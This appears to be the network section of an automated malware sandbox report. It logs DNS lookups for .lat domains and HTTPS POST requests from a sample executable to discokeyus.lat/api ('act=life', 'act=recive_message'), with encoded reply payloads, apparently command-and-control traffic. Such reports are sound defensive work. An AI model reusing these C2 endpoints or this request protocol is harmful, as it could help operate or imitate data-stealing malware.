Dec 20, 2024 16:39:37.028975010 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.029017925 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.076003075 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.084939003 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.138356924 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.157351971 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.160984039 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161025047 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161036015 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.161068916 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161115885 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.161123037 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161147118 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161195040 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.161331892 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.161351919 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.161365986 CET | 49734 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.161371946 CET | 443 | 49734 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.350574970 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.350671053 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:37.350802898 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.351191044 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:37.351207018 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:38.571461916 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:38.571587086 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:38.572815895 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:38.572845936 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:38.573110104 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:38.582232952 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:38.582391977 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:38.582452059 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:38.582556009 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:38.582571983 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:39.547914982 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:39.548032999 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:39.548161030 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:39.548243046 CET | 49737 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:39.548270941 CET | 443 | 49737 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:39.629245043 CET | 49739 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:39.629287958 CET | 443 | 49739 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:39.629404068 CET | 49739 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:39.629863024 CET | 49739 | 443 | 192.168.2.4 | 104.21.21.99
Dec 20, 2024 16:39:39.629879951 CET | 443 | 49739 | 104.21.21.99 | 192.168.2.4
Dec 20, 2024 16:39:40.841640949 CET | 443 | 49739 | 104.21.21.99 | 192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.841706991 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.862905025 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.862941027 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.863221884 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:40.866144896 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.866307974 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:40.866331100 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667073011 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667182922 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:41.667331934 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:41.667491913 CET49739443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:41.667512894 CET44349739104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:42.037110090 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037158966 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:42.037262917 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037677050 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:42.037687063 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.252512932 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.252650023 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.281445026 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.281469107 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.281819105 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.325728893 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.325881004 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.325917959 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:43.326000929 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:43.326013088 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640116930 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640223026 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:44.640310049 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:44.640510082 CET49741443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:44.640527010 CET44349741104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:45.367722034 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.367772102 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:45.367840052 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.368154049 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:45.368166924 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.580661058 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.580756903 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.582199097 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.582210064 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.582500935 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:46.586198092 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.586299896 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:46.586313963 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.652709007 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.652813911 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:47.653058052 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:47.653254032 CET49742443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:47.653271914 CET44349742104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:48.195290089 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195403099 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:48.195564032 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195919991 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:48.195952892 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.456291914 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.456371069 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.457715988 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.457736969 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.458028078 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.459387064 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460190058 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460232973 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460494041 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460526943 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460663080 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460690022 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.460823059 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.460865974 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461019993 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461061001 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461225986 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461266994 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461280107 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461297989 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461455107 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461489916 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.461519003 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461599112 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.461632013 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503334045 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503573895 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503624916 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503650904 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503673077 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:49.503724098 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:49.503745079 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.887825966 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.887954950 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.888039112 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.888247013 CET49743443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.888287067 CET44349743104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.898236036 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898289919 CET44349744104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:52.898371935 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898657084 CET49744443192.168.2.4104.21.21.99
                                                                                                                                              Dec 20, 2024 16:39:52.898672104 CET44349744104.21.21.99192.168.2.4
                                                                                                                                              Dec 20, 2024 16:39:53.857295990 CET49744443192.168.2.4104.21.21.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:39:17.895965099 CET | 58999 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:39:18.033123016 CET | 53 | 58999 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:39:18.045613050 CET | 49217 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:39:18.182950020 CET | 53 | 49217 | 1.1.1.1 | 192.168.2.4
Dec 20, 2024 16:39:18.189507961 CET | 55146 | 53 | 192.168.2.4 | 1.1.1.1
Dec 20, 2024 16:39:18.327400923 CET | 53 | 55146 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:39:17.895965099 CET | 192.168.2.4 | 1.1.1.1 | 0xf542 | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:39:18.045613050 CET | 192.168.2.4 | 1.1.1.1 | 0x31ac | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:39:18.189507961 CET | 192.168.2.4 | 1.1.1.1 | 0x8151 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 16:39:18.033123016 CET | 1.1.1.1 | 192.168.2.4 | 0xf542 | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:39:18.182950020 CET | 1.1.1.1 | 192.168.2.4 | 0x31ac | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:39:18.327400923 CET | 1.1.1.1 | 192.168.2.4 | 0x8151 | No error (0) | discokeyus.lat | | 104.21.21.99 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:39:18.327400923 CET | 1.1.1.1 | 192.168.2.4 | 0x8151 | No error (0) | discokeyus.lat | | 172.67.197.170 | A (IP address) | IN (0x0001) | false
• discokeyus.lat
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.21.99 | 443 | 7308 | C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:19 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                              Data Ascii: act=life
                                                                                                                                              2024-12-20 15:39:34 UTC1123INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:34 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=o2q08gqqg3dr5iekj000d7sr1t; expires=Tue, 15 Apr 2025 09:26:13 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCHCwvsSE%2BnGOwsNO5HFDrOSUk%2FDOY8ekioz3qWshEhQUep78jpRIAbfYWkm2MNjje9KKeismeT3WKzrgZsMzR4O817di1T7LceZ75bzqGuFmHKImtsWSrmyYY3L6xieYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b97b0ce2f02d-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4204&recv_bytes=905&delivery_rate=254843&cwnd=77&unsent_bytes=0&cid=e15fcd554e019dce&ts=15247&x=0"
2024-12-20 15:39:34 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-20 15:39:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.4 | 49734       | 104.21.21.99   | 443              | 7308 | C:\Users\user\Desktop\gJkNLYV0ax.exe
Timestamp               | Bytes transferred | Direction | Data
2024-12-20 15:39:36 UTC | 262               | OUT       | POST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 47
                                                                                                                                              Host: discokeyus.lat
2024-12-20 15:39:36 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-20 15:39:36 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:36 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=6qr23jlhkp0oiqflcsq0am5eb8; expires=Tue, 15 Apr 2025 09:26:15 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rL67hjfWyi4%2Bsmj7R1uuKjr3j9DcTY0mI4zobnnqG3%2B010xtAGVNJ%2FdMdpPOZN2oGkJ1p9u4RjnKNn%2FOmbjeEzCqozmSBhQGwwVcxDap6WhZHp9dsdawsbAFsPZi7q3xEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9e0fbb77285-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1781&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=1561497&cwnd=249&unsent_bytes=0&cid=cde7e75042f51d0e&ts=779&x=0"
                                                                                                                                              2024-12-20 15:39:36 UTC242INData Raw: 31 63 61 63 0d 0a 69 6e 69 39 43 62 5a 65 33 58 42 44 30 78 61 63 78 38 79 51 38 36 38 63 51 38 38 6f 2f 62 47 70 63 75 4f 37 45 6b 38 71 50 4a 37 78 57 73 73 72 6a 47 72 78 55 6a 43 32 4e 4b 61 7a 76 75 57 57 67 7a 34 69 71 77 72 48 31 38 67 65 6b 4e 34 2b 62 56 78 52 76 4c 41 65 33 47 58 46 4f 2f 46 53 4a 71 73 30 70 70 79 33 73 70 62 42 50 6e 6e 74 54 5a 66 54 79 42 36 42 32 6e 6b 67 57 6c 44 39 34 68 54 61 59 64 4d 39 75 52 45 76 76 6e 50 35 6f 71 33 36 6e 63 5a 78 4b 36 49 4b 30 5a 50 4d 43 4d 47 42 4d 41 4a 50 53 50 2f 48 47 63 35 69 6c 43 50 78 43 32 47 32 65 4c 37 39 37 76 47 57 7a 58 41 6c 71 30 4f 56 32 63 45 57 67 4e 39 34 50 30 4e 61 39 75 49 61 32 57 44 5a 4e 4b 30 63 4a 62 6c 34 2f 36 69 74 73 74 2b 4e
                                                                                                                                              Data Ascii: 1cacini9CbZe3XBD0xacx8yQ868cQ88o/bGpcuO7Ek8qPJ7xWssrjGrxUjC2NKazvuWWgz4iqwrH18gekN4+bVxRvLAe3GXFO/FSJqs0ppy3spbBPnntTZfTyB6B2nkgWlD94hTaYdM9uREvvnP5oq36ncZxK6IK0ZPMCMGBMAJPSP/HGc5ilCPxC2G2eL797vGWzXAlq0OV2cEWgN94P0Na9uIa2WDZNK0cJbl4/6itst+N
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 65 54 6e 74 45 74 2b 41 2b 52 4f 51 79 47 55 67 57 46 69 38 39 31 54 47 4b 39 4d 77 2f 30 70 68 75 58 6a 77 6f 4b 33 39 6c 73 78 2b 4d 36 4a 4b 6e 4e 76 44 46 49 76 57 66 79 4a 47 56 50 76 67 45 39 68 6b 30 7a 53 35 48 53 4c 78 4f 72 36 69 74 72 4c 4a 6a 56 34 78 72 6b 6d 4c 33 74 70 51 6e 70 64 70 62 55 39 53 76 4c 42 61 32 57 58 56 4d 62 38 41 4b 62 70 2f 2b 37 65 6c 2b 35 7a 41 66 69 79 6e 52 5a 7a 54 7a 42 71 4c 31 6e 6f 70 52 56 50 36 36 42 71 66 4a 5a 51 37 70 31 4a 35 38 56 66 37 74 61 6e 2b 68 34 39 45 59 62 49 45 68 70 50 4d 48 4d 47 42 4d 43 56 4e 58 66 2f 6a 46 64 78 6a 33 79 36 2f 41 43 65 38 63 65 79 6a 71 2f 79 62 7a 6d 77 72 6f 30 79 63 32 73 41 5a 68 4e 35 30 62 51 59 65 2b 2f 42 61 68 79 76 31 4d 62 51 65 4b 36 5a 30 76 72 72 67 36 39 48
                                                                                                                                              Data Ascii: eTntEt+A+ROQyGUgWFi891TGK9Mw/0phuXjwoK39lsx+M6JKnNvDFIvWfyJGVPvgE9hk0zS5HSLxOr6itrLJjV4xrkmL3tpQnpdpbU9SvLBa2WXVMb8AKbp/+7el+5zAfiynRZzTzBqL1nopRVP66BqfJZQ7p1J58Vf7tan+h49EYbIEhpPMHMGBMCVNXf/jFdxj3y6/ACe8ceyjq/ybzmwro0yc2sAZhN50bQYe+/Bahyv1MbQeK6Z0vrrg69H
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 30 79 51 33 73 64 51 7a 35 6c 33 4e 51 67 47 76 4d 49 5a 79 32 6a 65 66 6f 6f 52 4c 37 39 7a 36 4f 57 78 76 49 69 4e 65 53 33 74 45 74 2f 65 79 68 69 48 79 33 38 67 53 31 44 79 35 78 2f 51 59 39 51 38 73 68 63 6c 75 6e 2f 39 71 4b 72 67 6d 38 31 32 4a 4b 78 41 6c 5a 4f 46 55 49 62 42 4d 48 55 49 62 2b 76 6a 57 4f 70 6f 32 6a 4b 34 42 47 47 75 4f 75 66 6c 71 66 37 52 6c 54 34 73 70 55 2b 61 33 4d 6f 61 6a 39 78 36 49 55 42 51 2f 2f 6f 56 32 32 76 59 4e 4c 55 66 4c 37 56 38 39 36 36 6c 39 4a 48 4d 64 47 48 6a 43 70 6a 4c 69 30 6a 42 37 58 63 68 52 56 47 2b 33 52 6e 52 5a 64 4d 71 2f 77 31 76 71 44 54 35 71 65 36 71 30 63 46 33 49 61 5a 41 6d 39 50 4d 48 59 54 61 64 79 35 46 57 66 62 6d 48 64 74 6e 33 54 47 35 45 69 61 31 63 65 79 67 70 2f 36 64 6a 54 42 68
                                                                                                                                              Data Ascii: 0yQ3sdQz5l3NQgGvMIZy2jefooRL79z6OWxvIiNeS3tEt/eyhiHy38gS1Dy5x/QY9Q8shclun/9qKrgm812JKxAlZOFUIbBMHUIb+vjWOpo2jK4BGGuOuflqf7RlT4spU+a3Moaj9x6IUBQ//oV22vYNLUfL7V8966l9JHMdGHjCpjLi0jB7XchRVG+3RnRZdMq/w1vqDT5qe6q0cF3IaZAm9PMHYTady5FWfbmHdtn3TG5Eia1ceygp/6djTBh
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 33 53 55 49 62 56 4d 48 55 49 56 2f 58 36 46 4e 46 69 32 54 71 33 46 53 2b 38 66 2f 69 75 71 66 57 58 77 48 59 73 71 45 6d 65 31 38 45 43 67 74 4a 36 49 45 49 65 73 71 67 64 78 79 75 4d 66 4a 67 65 43 4b 46 76 37 4c 50 75 37 64 2f 55 50 69 61 68 43 73 65 54 79 42 2b 49 31 6e 67 6c 52 31 48 34 35 68 7a 5a 5a 74 45 7a 74 51 41 70 76 33 6e 31 71 71 58 67 6b 63 42 36 4c 61 6c 43 6c 4e 6d 4c 58 73 48 65 61 47 30 51 48 73 6e 6c 46 64 39 6f 77 6e 79 67 58 44 6a 78 63 2f 4c 6c 39 72 4b 64 77 33 34 75 6f 55 61 55 32 38 6f 63 6a 39 35 31 4a 45 42 57 37 75 6b 65 31 32 72 61 4d 37 34 57 4a 4c 52 77 2b 61 47 6f 2f 64 47 44 50 69 61 31 43 73 65 54 35 44 65 30 6d 31 45 58 43 45 47 79 38 56 72 59 5a 35 52 6b 2f 78 34 69 76 58 7a 78 6f 36 66 2b 6d 38 52 31 4c 61 5a 4f 6b
                                                                                                                                              Data Ascii: 3SUIbVMHUIV/X6FNFi2Tq3FS+8f/iuqfWXwHYsqEme18ECgtJ6IEIesqgdxyuMfJgeCKFv7LPu7d/UPiahCseTyB+I1nglR1H45hzZZtEztQApv3n1qqXgkcB6LalClNmLXsHeaG0QHsnlFd9ownygXDjxc/Ll9rKdw34uoUaU28ocj951JEBW7uke12raM74WJLRw+aGo/dGDPia1CseT5De0m1EXCEGy8VrYZ5Rk/x4ivXzxo6f+m8R1LaZOk
